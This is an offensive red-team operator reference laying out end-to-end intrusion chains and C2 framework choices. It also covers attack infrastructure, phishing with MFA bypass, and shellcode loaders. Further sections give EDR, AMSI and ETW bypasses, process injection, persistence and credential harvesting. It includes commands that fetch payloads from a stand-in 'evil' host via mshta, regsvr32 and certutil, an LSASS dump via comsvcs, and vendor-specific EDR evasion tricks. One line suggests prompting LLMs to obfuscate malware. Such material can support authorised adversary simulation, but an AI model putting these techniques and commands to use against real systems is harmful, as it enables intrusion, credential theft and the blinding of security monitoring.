Red Team Mapper v3.0
Comprehensive Operator Reference — From Infrastructure to Impact
C2 Frameworks
EDR Bypass
ADCS / AD Attacks
Cloud Operations
Initial Access
Infrastructure
Initial Access
Execution
Evasion
Lateral / Persist
Collection
Exfiltration
// Operation Flow Chains
End-to-end attack chains showing how red team operations connect from infrastructure through impact.
Classic Phishing β Beacon β DA
Build C2 + redirectors
βΊphish
HTML smuggle β ISO/LNK
βΊexecute
Shellcode loader
βΊbeacon
C2 callback
βΊAD attack
Domain Admin
EvilGinx MFA Bypass β Token Theft β Cloud Access
Setup EvilGinx proxy
βΊlure email
Victim enters creds + MFA
βΊcapture
Session cookie stolen
βΊreplay
Authenticated as user
βΊpivot
M365 / Azure / On-prem
Loader β Unhook β Inject β Beacon (EDR Bypass Chain)
Custom loader (Rust/C)
βΊpatch AMSI
AMSI + ETW bypass
βΊfresh ntdll
Unhook EDR
βΊsyscall inject
Process injection
βΊsleep obf
Stable C2 beacon
DLL Sideload β Signed Binary β Persistence
Find signed EXE + DLL
βΊcraft DLL
Proxy DLL (exports)
βΊdrop pair
Signed EXE loads our DLL
βΊpersist
Registry Run key / schtask
βΊbeacon
Persistent C2
Lateral Movement β Pivot β Exfil
Dump creds (LSASS/DPAPI)
βΊPtH / PtT
Move to high-value target
βΊSMB pipe
Deploy beacon (child)
βΊSnaffler
Collect sensitive data
βΊstaged exfil
HTTPS C2 exfil
ZIP β LNK β Signed EXE β DLL Sideload β C2 (Gold Standard)
ZIP (inner dir + multi-file)
βΊuser clicks
LNK trigger
βΊlaunches
Signed EXE (reputation pass)
βΊsideload
Unsigned malicious DLL
βΊbeacon
C2 + decoy PDF opens
search-ms β WebDAV β LNK β Sideload (Protocol Handler Abuse)
Phishing email / site
βΊsearch-ms: URI
Explorer shows WebDAV files
βΊappears local
User clicks LNK
βΊsideload
Signed EXE + malicious DLL
βΊcallback
C2 beacon
RDP File β PyRDP β TypeLib COM Hijack (Phish-to-Persist)
Victim opens .rdp file
βΊconnects
PyRDP server + auto-exec
βΊenum dirs
Deploy DLL + BAT + SCT
βΊhijack
TypeLib COM persistence
βΊself-clean
Persistent backdoor
ClickFix β Clipboard PowerShell β Download β Execute
Fake CAPTCHA page
βΊcheckbox
JS copies PS to clipboard
βΊWin+R paste
PowerShell download cradle
βΊfetch
Stage 2 payload
βΊexecute
C2 beacon + persist
Device Code Phish β Token Capture β M365 β Cloud Lateral
Dynamic device code gen
βΊphish link
Victim enters code + MFA
βΊcapture
Access + refresh tokens
βΊenumerate
M365 / Azure / SharePoint
βΊpersist
App registration + passkey
WDAC Policy Deploy β Reboot β EDR Killed β Full Control
Deploy custom WDAC policy
βΊblocks EDR
Policy blocks EDR drivers
βΊreboot
EDR fails to start
βΊoperate
Unmonitored system
βΊextract
Full credential dump + exfil
ADCS ESC4 β Template Modify β ESC1 β Golden Cert
Find vulnerable ESC4 template
βΊmodify
Enable SAN on template
βΊwait β€8h
Request cert as DA
βΊauth
PKINIT TGT β DA access
BadSuccessor (dMSA) β Server 2025 β Domain Admin
Find dMSA-enabled DC
βΊenum
Exploit dMSA delegation
βΊSharpSuccessor
Impersonate any account
βΊescalate
Domain Admin
vSphere Snapshot β .vmem Download β Credential Extraction
vSphere admin access
βΊsnapshot
Download .vmem + .vmsn
βΊvmss2core
Convert to .dmp
βΊMemProcFS
Extract LSASS creds offline
On-Prem AD β SeamlessSSO β Silver Ticket β Cloud Token
Dump AZUREADSSOACC$ hash
βΊforge
Kerberos Silver Ticket
βΊSOAP
DesktopSsoToken
βΊexchange
Azure access + refresh token
βΊcloud access
Full Azure / M365 control
NTLM Reflection β SMB to LDAPS β Full Domain Compromise
Coerce NTLM auth
βΊCVE-2025-33073
SMB to LDAPS relay
βΊbypass signing+binding
Modify AD objects
βΊRBCD/ShadowCred
Domain compromise
Shadow Creds β Coercion β LDAP Relay β Persistence
Coerce auth (Coercer)
βΊrelay
LDAP relay + msDS-KeyCredentialLink
βΊflags=0x02
keycred bypass patch
βΊTGT
Persistent access via Shadow Credentials
MSSQL Linked Server β Multi-Hop β CREATE ASSEMBLY β Implant
Initial MSSQL access
βΊlinked server
Chain through links
βΊenable CLR
CREATE ASSEMBLY .NET DLL
βΊexecute
C2 implant in MSSQL process
// Reconnaissance
Pre-engagement intelligence gathering to map attack surface, identify vulnerabilities, and plan entry points.
Supply Chain Mapping
Identify third-party dependencies and vulnerabilities in the target's supply chain.
- Dependency scanning: Tools like Deps.dev or Snyk to analyze public repositories for vulnerable packages.
- CI/CD poison: Target GitHub Actions or Jenkins pipelines for code injection.
- OSINT sources: Shodan, Censys for exposed services; GitHub dorks for leaked configs.
- Attack paths: Exploit misconfigured dependencies to gain initial access or escalate.
- OPSEC: Use anonymous proxies for scans to avoid early detection.
// C2 Frameworks Deep Dive
Command and Control is the backbone of any red team operation. Choosing the right framework determines your capabilities, OPSEC profile, and flexibility.
Default Configs = Burned Operation. Every major C2 framework has signatured default configurations. Cobalt Strike's default JARM fingerprint, Sliver's Go runtime, and Havoc's default HTTP headers are all detected. Customize everything before deployment.
Cobalt Strike
Industry standard β Beacon payload, Malleable C2, mature ecosystem
- Beacon: Staged/stageless, HTTP/HTTPS/DNS/SMB/TCP listeners
- Malleable C2: Full control over network indicators β mimic any HTTP traffic pattern
- BOFs (Beacon Object Files): Run compiled C in Beacon's memory β no fork & run
- Sleep mask: Encrypt Beacon in memory during sleep β evade memory scanners
- OPSEC concerns: Default configs heavily signatured β MUST customize profiles, watermarks tracked
- CS 4.12 UDC2: ICMP channel + REST API for AI/automation integration
- Arsenal Kit: Modify artifact/resource/sleep mask/process injection behavior
Havoc
Open-source, modern C2 β Demon agent, extensible via Python/C
- Demon agent: Position-independent, supports indirect syscalls natively
- Sleep obfuscation: Ekko/Zilean built-in β encrypts agent in memory during sleep
- No fork & run: Inline execution by default β better OPSEC than CS fork & run
- Extensible: Python API for custom commands, modules, and post-exploitation
- Listeners: HTTP/HTTPS with customizable profiles
- Free & open source β actively developed, growing community
Sliver
Open-source by BishopFox β implants in Go, multi-protocol
- Implants: Compiled Go binaries β cross-platform (Windows/Linux/macOS)
- Protocols: mTLS, WireGuard, HTTP(S), DNS β all encrypted by default
- Multiplayer: Multiple operators, role-based access, real-time collaboration
- Armory: Extension/alias package manager (BOFs, .NET assemblies)
- OPSEC note: Go implants are large (~10MB+), runtime is signatured by some EDRs
- Pivots: TCP/Named pipe pivots for internal C2 chains
Mythic
Collaborative, multi-agent C2 platform β containerized architecture
- Multi-agent: Apollo (C#), Athena (.NET), Poseidon (Go), Medusa (Python), Merlin
- Containerized: Each agent/C2 profile runs in Docker β modular, easy to extend
- UI: Web-based dashboard with task tracking, file browser, MITRE ATT&CK mapping
- Custom agents: Build your own agent in any language with the Mythic agent framework
- P2P: Agent-to-agent communication for internal pivoting
Brute Ratel C4
Commercial adversary simulation β Badger agent, focused on EDR evasion
- Badger: Designed from the ground up for EDR evasion
- Syscalls: Indirect syscalls by default β avoids user-mode hooks entirely
- Sleep obfuscation: Built-in memory encryption during callbacks
- Stack spoofing: Return address spoofing to evade stack-based detections
- DOH: DNS-over-HTTPS for C2 communication
- teamsc2: Routes C4 traffic over Microsoft Teams API β blends perfectly
Covert C2 Channels
Living-off-the-cloud redirectors β route C2 through infrastructure defenders can't block
GraphStrike: Routes Cobalt Strike traffic over Microsoft Graph API β blends into M365ProxyBlob: Reverse SOCKS5 over Azure Blob Storage β bypasses NetskopeTurnt: SOCKS proxy over TURN servers (Teams/Zoom endpoints)Stillepost: Proxy C2 HTTP through Chromium via Chrome DevTools Protocolteamsc2: Brute Ratel C2 channel via Microsoft Teams APIconvoC2: Conversation-based C2 via messaging platform APIsCS-EXTC2-NTP: Cobalt Strike External C2 over NTP (UDP 123) β universally allowed
// Red Team Infrastructure
Your infrastructure IS your OPSEC. Poor setup = burned operation. Every component needs separation, redundancy, and deniability.
Infrastructure Architecture
OPERATOR MACHINE βββ VPN / Tor / Jump Box // Never connect directly to C2 team server βββ C2 TEAM SERVER (VPS) βββ HTTPS Redirector nginx/Apache reverse proxy β categorized domain β βββ CDN Layer CloudFront / Azure CDN / Fastly β βββ Domain Fronting SNI = legit.com, Host: = evil.com βββ DNS Redirector socat UDP relay or DNS-over-HTTPS βββ SMB Pipe Listener Internal pivots, no egress needed βββ Payload Hosting S3 / Azure Blob / GitHub raw (burned after use) PHISHING INFRASTRUCTURE (separate from C2!) βββ SMTP Server Postfix + DKIM + SPF + DMARC β pass email checks βββ GoPhish / Custom Campaign management + tracking βββ EvilGinx Transparent proxy for MFA bypass (AitM) βββ Landing Pages Cloned portals β’ HTTPS β’ categorized domains DOMAIN STRATEGY βββ Age domains >30 days before use // Fresh domains = red flag βββ Get categorized (Health, Finance, Tech) // Bluecoat, VirusTotal, Fortiguard βββ Separate domains: phishing / C2 / payload hosting // Burn one β burn all βββ Valid SSL from Let's Encrypt or purchased CA // Self-signed = instant detection
Redirectors
Never expose your team server β always proxy through redirectors
- HTTPS Redirector: nginx reverse proxy β filter by User-Agent, URI, headers
- Apache mod_rewrite: Conditional forwarding based on request attributes
- socat: Simple TCP/UDP relay:
socatUDP4-RECVFROM:53,fork UDP4-SENDTO:c2server:53 - CDN fronting: CloudFront, Azure CDN β C2 traffic looks like CDN HTTPS
- Separation: Long-haul (persistent), short-haul (interactive), phishing (burned after campaign)
- Burn protocol: If redirector is flagged β replace VPS + domain, team server untouched
Malleable C2 Profiles
Shape your C2 traffic to look like legitimate services
- Purpose: Define how Beacon communicates β HTTP headers, URIs, encoding, timing
- Mimic: jQuery, Amazon, Google APIs, Microsoft update traffic
- Critical settings:
set sleeptime,set jitter,set useragent - JARM fingerprint: Default CS JARM is signatured β use custom TLS or nginx in front
Sourcepoint: Malleable C2 profile generator β automates evasive profiles- Test:
c2lintto validate profile before deployment
Infrastructure OPSEC
Operational security for attack infrastructure β don't let your boxes betray you
- Hostname OPSEC: Always rename attack boxes to match client naming convention. Kali hostnames are instantly flagged
fakeprinter: Python scripts making your box appear as HP printer on expected portsArtillery: Honeypot alerter on attack box β detect defenders probing your infraRedELK: Red Team's SIEM β operational logging, monitoring, blue team detectionGhostwriter: Report writing + infrastructure management platform- Environmental keying: Offload checks to server-side β DoH for DNS-based keying
Infrastructure as Code
Automate infra deployment β spin up/tear down in minutes
- Terraform: Provision VPS, DNS records, CDN, and firewall rules
- Ansible: Configure team servers, install tools, deploy redirectors
Red-Baron: Terraform modules specifically for red team infraNebula: Pre-built red team infrastructure templates- Benefits: Consistent deployments, fast teardown, version-controlled, repeatable
- Tip: Keep Terraform state encrypted β it contains all IP addresses and configs
// Initial Access
Getting that first callback. Phishing remains the most common vector, but techniques evolve constantly as email gateways and endpoint protections improve.
HTML Smuggling
Deliver payloads through HTML/JS β bypasses email gateways and proxies
- Embed payload as base64 or encrypted blob inside an HTML file
- JavaScript decodes and offers the file for download when opened in browser
- Bypasses: Email attachment scanners only see an HTML file, not the payload inside
- Blob method:
window.URL.createObjectURL(new Blob([bytes])) - Encryption: XOR or AES encrypt the blob, derive key from URL fragment or user input
- Pair with: ISO/ZIP/VHD container to bypass MOTW (Mark-of-the-Web)
Macro-less Payloads
Microsoft blocked VBA macros by default β post-macro era vectors
- LNK files: Shortcut with PowerShell/cmd command line β still very effective
- ISO / IMG / VHD: Container files that auto-mount β contents bypass MOTW (pre-patch)
- OneNote (.one): Embed scripts, HTA, or EXE as attachments β social engineer the click
- CHM (Compiled HTML Help): Execute embedded scripts via hh.exe
- XLL (Excel Add-in): Native DLL loaded by Excel β code execution on open
- Trend: Shift toward LNK + DLL sideloading as primary delivery mechanism
Credential Phishing (AitM)
Adversary-in-the-Middle proxies β capture credentials AND MFA tokens
EvilGinx 3: Transparent reverse proxy β sits between victim and real login page- Captures username, password, and session cookies after MFA
Modlishka: Similar transparent proxy β real-time credential harvesting- MFA bypass: Works against TOTP, push notifications, SMS β only FIDO2/WebAuthn is resistant
- Cookie replay: Import stolen session cookie into browser β fully authenticated session
Device Code Phishing
Bypass MFA including FIDO2 β capture OAuth tokens through device authorization flow
- Bypasses FIDO2: Device code flow captures full access+refresh tokens, bypassing phishing-resistant MFA
- AWS SSO variant:
aws sso loginenables identical attack β no CA policy exists to block it - Vishing combo: Walk target through code entry over phone call β "verify your identity" pretext
GraphSpy: Backend for device code polling + token storage + auto-captureTokenPhisher/SquarePhish: Dedicated frameworks- Persist: Captured refresh tokens survive password changes β add app registration
Email Delivery & Inbox Landing
Getting past email gateways into the inbox β sender reputation is everything
- LarkSuite (ByteDance): Free custom domain accounts, no outbound content filtering, 20min setup
- SharePoint spoof: Remove Exchange license β share SPO file β sends from
no-reply@sharepointonline.comwith DMARC pass - Trusted platform abuse: DocuSign, AdobeSign, SurveyMonkey, Microsoft Forms β all from allowlisted domains
- iCal organizer spoof: Outlook renders calendar invites based on ICS organizer field, not actual sender
- Hidden text salting: Insert invisible text in email HTML to confuse keyword-based detection engines
In-Memory Webshells
Fileless webshells that live entirely in memory β no artifacts on disk
Godzilla: Java memshell β widespread adoption, runs entirely in JVM memoryGhostWebShell: ASP.NET in-memory webshell by MDSec β no file droppedIceApple: IIS/ASP.NET post-exploitation β hooks HttpApplication pipeline for persistent access- Detection gap: Traditional file integrity monitoring and AV scanning miss memory-resident webshells
- Persistence: Survives until application pool recycles or server reboots
External Service Exploitation
VPN, Citrix, OWA, VDI β internet-facing services with weak auth
- Password spraying: Slow spray against OWA, VPN portals, Citrix
- Credential stuffing: Breached credentials tested against corporate SSO
- VPN without MFA: Single-factor VPN = direct internal network access
- OWA / Exchange: Valid creds β email access β internal phishing from trusted sender
- Tools:
trevorspray,SprayingToolkit,MailSniper - OPSEC: Respect lockout policies, spray low and slow (1 attempt per 30min+)
Physical Access / USB
When digital access fails β physical implants, drops, and social engineering
- USB Rubber Ducky: HID device that types payloads as keyboard input β bypasses USB restrictions
- Bash Bunny: Multi-vector USB attack tool (HID + storage + network)
- USB drops: Leave weaponized USBs in parking lots / lobbies / break rooms
- LAN Turtle: Covert inline network implant β reverse shell over cellular
- O.MG Cable: USB cable with embedded implant β keystroke injection + WiFi C2
- Tailgating: Follow employees through badge-access doors β physical security test
// Payload Development
The payload is what runs on the target. Loaders, shellcode, and delivery mechanisms determine whether you get caught in seconds or maintain access for months.
Shellcode Generation
Raw position-independent code β the foundation of every payload
- Cobalt Strike: Attacks β Packages β Windows Executable (Stageless) β Raw
- Donut: Convert .NET assemblies, PE files, VBS, JS into position-independent shellcode
Donut-i beacon.exe -o beacon.bin -a 2 -f 1 β x64, raw format- sRDI: Shellcode Reflective DLL Injection β convert any DLL to shellcode
- Custom: Write your own in C/Rust β avoid known signatures entirely
- Encryption: Always encrypt shellcode at rest β XOR, AES, RC4 with runtime decryption
Shellcode Loaders
The code that decrypts, allocates, and executes your shellcode
- Basic flow: Read encrypted shellcode β decrypt β allocate RWX memory β execute
- Better: NtAllocateVirtualMemory (syscall) β NtWriteVirtualMemory β NtCreateThreadEx
- Callback execution: Use Windows callbacks to trigger shellcode (EnumFonts, CreateFiber, etc.)
- Languages: C/C++ (smallest, fastest), Rust (safe + small), Nim (emerging), Go (cross-platform)
- Separation: Store encrypted shellcode separately (resource, URL, registry) β not embedded
- Sandbox evasion: Check for debugger, sleep acceleration, low RAM, no user interaction
DLL Sideloading
Abuse DLL search order of signed binaries to load malicious DLLs
- Concept: Signed EXE looks for a DLL β place your DLL where it searches first
- Proxy DLL: Forward all original exports to the real DLL + add malicious code
- Finding candidates:
Spartacus,DLLSpy, Process Monitor (filter: NAME NOT FOUND) - Why it works: The signed EXE loads your DLL β EDR sees trusted process loading DLL
DllShimmer: Auto-generates proxy DLL source for any DLL- OPSEC: Choose EXEs that normally load DLLs from their directory
Advanced Payload Engineering
PIC compilation, metamorphic cross-compilation, and ML-based evasion
EPIC: Cross-platform C/C++ to PIC shellcode builder β modular, minimal libc- EPIC RBX trick:
-ffixed-rbxGCC flag reserves RBX for global R/W context across PIC Dittobytes: Metamorphic cross-compilation β each compile produces unique binaryCrystal Palace: Mudge's position-independent DLL loader linkerEvadeX: Commercial C# obfuscator effective against ML detections- Shellcode encoding: Simple XOR sufficient β RC4 via SystemFunction032/33 specifically detected by EDRs
T-1: ML-based sandbox detection shellcode loader
LOLBins (Living Off the Land)
Abuse legitimate Windows binaries to execute code β no custom EXE needed
- mshta.exe: Execute HTA files β
mshta http://evil/payload.hta - rundll32.exe: Load and execute DLL exports β
rundll32 payload.dll,EntryPoint - msbuild.exe: Compile and execute inline C# from .csproj/.xml files
- regsvr32.exe: Load COM scriptlets β
regsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll - certutil.exe: Download files β
certutil -urlcache -split -f http://evil/payload.exe - Reference: LOLBAS Project (lolbas-project.github.io) β full database
Python & .NET Payload Delivery
Abuse legitimate runtimes for payload execution β blend with dev environments
- Python environment drop: Deploy
pythonw.exe+ ctypes shellcode loader in dependencies β schtask persist - MSSQL CREATE ASSEMBLY: Load managed .NET DLL C2 implant directly into MSSQL process
Inline-EA: CS BOF for evasive inline .NET assembly execution β no fork & run- AppDomainManager injection: Hijack .NET AppDomainManager to load malicious assemblies
koneko: Cobalt Strike shellcode loader with advanced evasion
// Defense Evasion
Modern EDRs hook userland APIs, scan memory, inspect call stacks, and correlate telemetry. Every technique here addresses a specific detection mechanism.
EDR Detection Layers (6): Static Signatures β Userland Hooks β ETW Telemetry β Kernel Callbacks β Memory Scanning β Behavioral/Call Stack. Effective evasion addresses all layers, not just AV signatures.
EDR Detection Layers & Bypasses
LAYER 1: STATIC SIGNATURES βββ AV/YARA rules on disk // Bypass: encryption, obfuscation, packing βββ Import table analysis // Bypass: dynamic resolution, syscalls LAYER 2: USERLAND HOOKS βββ ntdll.dll hooks // Bypass: unhooking, direct syscalls βββ AMSI (amsi.dll) // Bypass: patch AmsiScanBuffer, hardware BP LAYER 3: ETW TELEMETRY βββ EtwEventWrite // Bypass: patch to ret, NtTraceEvent hook βββ Threat Intelligence ETW // Bypass: disable provider GUID LAYER 4: KERNEL CALLBACKS βββ PsSetCreateProcessNotifyRoutine // Can't bypass from userland βββ ObRegisterCallbacks // Process handle ops (LSASS access) LAYER 5: MEMORY SCANNING βββ RWX region detection // Bypass: RW β RX flip, no RWX βββ Unbacked memory execution // Bypass: module stomping, phantom DLL LAYER 6: BEHAVIORAL / CALL STACK βββ Call stack analysis // Bypass: stack spoofing, return address overwrite βββ Suspicious API call chains // Bypass: indirect execution, callbacks
AMSI Bypass
Antimalware Scan Interface β scans PowerShell, .NET, VBScript, JScript at runtime
- Patch AmsiScanBuffer: Overwrite first bytes with
retβ all scans return clean - Hardware breakpoints: Set BP on AmsiScanBuffer, modify args in exception handler β no memory patch needed
- WriteProcessMemory patch: Internally modifies memory perms, avoids VirtualProtect trigger
- No C3 (RET) byte: Defender detects
C3written to function prologues β usePOP RAX; JMP RAX Null-AMSI: Uses .NET Reflection to setamsiInitFailedβ all subsequent scans return clean- Important: AMSI patch must happen before loading any .NET tools or PS scripts
Direct / Indirect Syscalls
Call the kernel directly β bypass all userland hooks entirely
- Direct syscalls: Embed syscall instruction in your code β never touch ntdll.dll
- Indirect syscalls: Jump to the syscall instruction inside ntdll.dll β legitimate return address
SysWhispers3: Generate syscall stubs with multiple bypass optionsHellsGate: Dynamically resolve syscall numbers at runtime from ntdllHalosGate: Resolve syscall numbers even when ntdll is hooked (neighbor stub technique)- Why indirect: Direct syscalls have return address outside ntdll β detectable by stack analysis
Sleep Obfuscation
Encrypt the implant in memory during sleep β evade periodic memory scans
- Problem: C2 implants sleep 90%+ of the time β memory scanners look for implant signatures
- Ekko: Use
CreateTimerQueueTimerto chain ROP: RW β encrypt β sleep β decrypt β RX - Foliage: APC-based sleep obfuscation using
NtQueueApcThread - Deathsleep: Unmap implant memory entirely during sleep β nothing to scan
- Heap encryption: Encrypt all heap allocations, not just implant image
- OPSEC: The encryption itself creates patterns β advanced EDRs detect timer-based chains
API Unhooking
Remove EDR hooks from ntdll.dll β restore clean syscall stubs
- Fresh copy: Read clean ntdll.dll from disk, overwrite .text section of loaded ntdll β all hooks removed
- Perun's Fart: Suspend all threads, unhook, resume β avoids race conditions
- KnownDlls: Read from
\KnownDlls\ntdll.dllkernel object β always clean - From suspended process: Spawn suspended process β read its ntdll (before EDR hooks) β copy
- Detection: EDRs check ntdll integrity β some re-hook after unhooking detected
Call Stack Spoofing
Fake the call stack to hide where execution originated β defeat stack-walking detections
- Problem: EDRs walk the call stack β return addresses pointing to unbacked memory = alert
- ThreadStackSpoofer: Replace return addresses with pointers to legitimate module code
- SilentMoonwalk: Desync the call stack before API calls, restore after
- Return address overwrite: Before each sensitive API call, overwrite stack with legitimate RAs
- TLS callbacks: Use TLS directory callbacks for execution β unusual call origin
EDR-Specific Bypasses
Vendor-specific weaknesses for major EDR products
- Cortex XDR: ~50+ excluded EXE names in registry β naming binary
apache.exeprevents hook DLL loading - CrowdStrike time desync: Manipulating system clock β actions don't appear in console (15min window)
- CrowdStrike drag-and-drop: Copy-paste of SAM/SYSTEM hives flagged, but drag-and-drop uses different API
- SentinelOne VEH bypass: Insert VEH handler with arg
0(append) β S1 doesn't re-add its handler - 7-Zip raw disk: Browse
\\.\PhysicalDrive0in 7-Zip to copy SAM/SYSTEM β most EDRs don't monitor this EDRSilencer: Uses Windows Filtering Platform to block EDR network communications- WDAC EDR kill: Deploy WDAC policy blocking EDR drivers β reboot β EDR fails to start
Code Signing & Reputation Evasion
Abuse certificate trust and SmartScreen reputation to bypass static defenses
- Expired certificate signing: SmartScreen treats any certificate as less suspicious β expired certs work
- Elastic EDR gap: Rules check for "unsigned" but expired certs return
errorExpiredβ bypasses check - Sources: Find leaked OV certs on GitHub, VirusTotal, open S3 buckets (
GrayhatWarfare) Limelighter: Generate fake/spoofed code signatures for DLLs, EXEs, MSIs- File inflation: Defender doesn't scan files >50MB. Falcon cloud ML default cutoff ~35MB
Malware Virtualization & Anti-Analysis
Run malicious code in custom VM interpreters β evade static, behavioral, and memory analysis
- RISC-V VM:
riscy-businessβ run code in RISC-V virtual machine interpreter, no executable memory needed - Commercial: Themida, VMProtect β production-grade code virtualization and packing
- Module overloading: Load PE on top of legitimate module's memory space β code appears backed by legit DLL
- Donut customization: Default Donut has detectable AMSI patching + 10KB signatured bootstrap. Remove aPLib, externalize loader
- LLM-assisted obfuscation: Prompt LLMs to reorder code, introduce junk with
volatile/register
// Process Injection Techniques
Running your code inside another process β the core tradecraft of any implant. Each technique has different detection signatures, OPSEC tradeoffs, and requirements.
Classic Injection (VirtualAllocEx)
The textbook method β heavily detected but worth understanding as a baseline
- Why detected: Every step triggers kernel callbacks β cross-process handle + RWX + remote thread = instant alert
- EDR sees: Process handle access (ObRegisterCallbacks), memory allocation, thread creation
- Only useful: In unmonitored environments or as learning exercise
Module Stomping / Phantom DLL
Overwrite a legitimate DLL's .text section with shellcode β execution from backed memory
- Module stomping: Load a benign DLL β overwrite its .text with shellcode β execute
- Memory region shows as backed by a legitimate DLL on disk
- Phantom DLL: Load a DLL that doesn't exist on disk (transaction rollback) β backed but no file
- OPSEC: Choose a DLL that's normally loaded by the target process
Threadless Injection
No thread creation or APC queue β hook APIs in target process to trigger shellcode naturally
- Concept: Place hooks on regularly-called APIs in the target process
- When the target process naturally calls the hooked API, shellcode triggers automatically
- No thread creation: No CreateRemoteThread, no APC, no thread hijacking β purely event-driven
- Detection status: Not detected by any major vendor as of testing β fundamentally different from traditional injection
- OPSEC: The gold standard for process injection
Early Cascade Injection
Intercept process creation at the earliest stage β before EDR hooks are established
- Concept: Intercept the DLL loading cascade during process initialization
- DEBUG_PROCESS: Use debug flag instead of CREATE_SUSPENDED β different process creation path
- Race condition: Wins the race against EDR hook installation by operating earlier in the cascade
- Thread Name-Calling: Use thread description API (
NtSetInformationThread) to write shellcode via thread name primitive - Hardware BPs without SetThreadContext: Use INT3 + VEH to set DR0-DR3 debug registers β avoids ETW-Ti events
APC Injection & Thread Pool
Queue shellcode as APC or via Windows Thread Pool for natural execution
- Early Bird variant: Create process suspended β write shellcode β APC on main thread β resume
- Early Bird executes before EDR DLL is loaded into the new process
- Thread Pool TP_WORK: Create work item pointing to shellcode β submitted to thread pool
- Thread pool threads have legitimate call stacks β harder to distinguish from normal work
- Used by Nighthawk C2 β very effective against call stack analysis
Callback-based & PE File Injection
Use Windows API callbacks and Cordyceps technique for alternative execution
- Callback techniques: EnumFonts, EnumWindows, CreateFiber, CreateTimerQueueTimer, CertEnumSystemStore
- Why: No CreateThread/CreateRemoteThread β execution triggered by benign-looking API call
- Cordyceps (PE injection): Reuse target PE's IAT and data sections, change execution flow β no process injection APIs
RedBackdoorer: Implements Cordyceps technique for PE file backdooring- HTTP.sys backdoor: Kernel-mode HTTP.sys API β no admin needed, shows as PID 4 (System)
// Persistence Mechanisms
Surviving reboots, credential rotations, and remediation. The best persistence is the one that looks like normal system behavior.
Registry & COM Hijacking
Run keys and COM object replacement β stealthy, triggered by legitimate activity
- HKCU\...\Run: Per-user, no admin needed β point to signed EXE with DLL sideload
- COM Hijacking: Windows looks up COM objects in HKCU first, then HKLM β create HKCU override
- Find targets: Process Monitor β filter for RegOpenKey with NAME NOT FOUND on HKCU CLSIDs
HKCU\Software\Classes\CLSID\{CLSID}\InprocServer32β point to your DLL- OPSEC: Extremely stealthy β triggered by normal system activity, no new autorun entry visible
- TypeLib COM Hijacking: Modify HKCU TypeLib entries β very rarely monitored, self-cleaning
Scheduled Tasks & WMI Events
Reliable system scheduler-based persistence with fileless WMI alternative
- COM-based creation: Use ITaskService COM interface β avoids schtasks.exe command line logging
- Hide the task: Delete SD registry value at
HKLM\...\Schedule\TaskCache\Tree\TaskName - WMI subscriptions (fileless): EventFilter + EventConsumer + Binding β stored in WMI repository
- Triggers: Process start, user logon, timer interval, USB insert
SharpEventPersist: Create WMI event subscriptions from .NET- Detection: Event 4698 (task created), Sysmon Event 19/20/21 (WMI events)
DLL Sideloading Persistence
Signed binary + malicious DLL β survives reboots via autorun
- Most OPSEC-friendly persistence: Combines signed binary trust with DLL hijack
- Setup: Drop signed EXE + proxy DLL to persistent location (AppData, ProgramData)
- Trigger: Scheduled task, Run key, or service pointing to the signed EXE
- Proxy DLL: Forwards all legitimate exports + executes shellcode in DllMain
- Finding pairs:
Spartacus,WFH (Windows Feature Hunter)
Browser Extension & Office Template
Silent Chrome extension install and Office trusted location persistence
- Chrome extension: Silent install β C2 via Native Messaging API through browser process
- Cookie access: Extension reads cookies, session tokens, and form data from all sites
- XLSTART persistence: Copy XLAM to
XLSTARTtrusted location β auto-loads when Excel opens - No MOTW: Trusted locations exempt from MOTW β VBA runs without prompts
- DNS TXT persistence: Store PS expressions in DNS TXT records β LNK evaluates TXT record on login
// Credential Access
Harvesting credentials from memory, disk, and user behavior. Every credential type enables different lateral movement options.
LSASS is the #1 EDR alert trigger. Opening any handle to LSASS triggers ObRegisterCallbacks immediately. Use remote methods (DCSync, secretsdump), handle duplication, or physical memory access to avoid direct LSASS access.
LSASS Evasive Dumping
Advanced techniques to dump LSASS while evading modern EDR detections
- Handle duplication: Scan all processes for existing LSASS handles β duplicate β avoids opening direct handle
nanodump: Duplicated handle dump + encrypted chunks directly to operator β never touches disk- Remote physical memory:
physmem2profitβ remotely map physical memory and create LSASS minidump - Dump to remote share: Write LSASS dump directly to SMB share or WebDAV β bypasses local FS monitoring
- 7-Zip raw disk: Browse
\\.\PhysicalDrive0β copy SAM/SYSTEM β not locked at raw disk level - comsvcs.dll LOLBin:
rundll32 comsvcs.dll MiniDump PID file full
DPAPI & Browser Credential Harvesting
Decrypt browser passwords, cookies, Wi-Fi keys, certificates stored via Windows DPAPI
- Chrome App-Bound Encryption bypass: Run decryption binary from
C:\Program Files\Google\Chrome\Application\ - Custom extension: Chrome extension accesses cookies directly β bypasses app-bound encryption
ChromeKatz BOF: In-memory Chrome cookie/password dump via BeaconDonPAPI: Automated DPAPI harvesting across multiple hosts remotelydploot: Python DPAPI looting β masterkeys, credentials, vaults, browser- Domain Backup Key: DCSync retrieves DPAPI domain backup key β decrypt any user's secrets
Kerberos Ticket Harvesting
Extract TGTs and TGS tickets from memory for pass-the-ticket attacks
Rubeusdump β extract all tickets from current logon sessionRubeusmonitor /interval:5 β monitor for new TGTs (useful on unconstrained delegation hosts)- Linux: Tickets stored in
/tmp/krb5cc_*or kernel keyring - ccache files: Copy and use with impacket tools β
export KRB5CCNAME=ticket.ccache - Key material: NT hash + AES256 key enable forging tickets without touching LSASS
Sensitive File Discovery
Find passwords, keys, and secrets in files across the network
Snaffler: Automated sensitive file discovery across SMB shares- Finds: passwords in configs, private keys, KeePass databases, connection strings
Seatbelt: Local host survey β browser data, credentials, tokens, interesting files- Common targets: web.config, appsettings.json, .env files, PowerShell history, unattend.xml
- SharePoint / Confluence: Internal wikis often contain credentials in pages
- Git repos:
trufflehog,GitLeaksβ scan for secrets in commit history
All-in-One Credential Dumping
Grab everything at once β browsers, Wi-Fi, mail clients, databases, sysadmin tools
LaZagne: All-in-one β browsers, Wi-Fi, mail (Outlook, Thunderbird), databases, sysadmin tools (FileZilla, PuTTY, WinSCP)- Coverage: 40+ applications supported across Windows and Linux β single binary, no dependencies
BrowserSnatch: Multi-browser harvesting β Chrome, Firefox, Edge, Brave, OperaRemoteMonologue: DCOM-based NTLMv1/v2 extraction from remote machines without LSASSGhostKatz: Physical memory-based LSASS reading β bypasses PPL and process-level protectionsSCCMDecryptor-BOF: BOF for decrypting SCCM NAA, task sequences, and collection variables
// Lateral Movement
Moving through the network after initial compromise. Each method has different port requirements, authentication types, and OPSEC signatures.
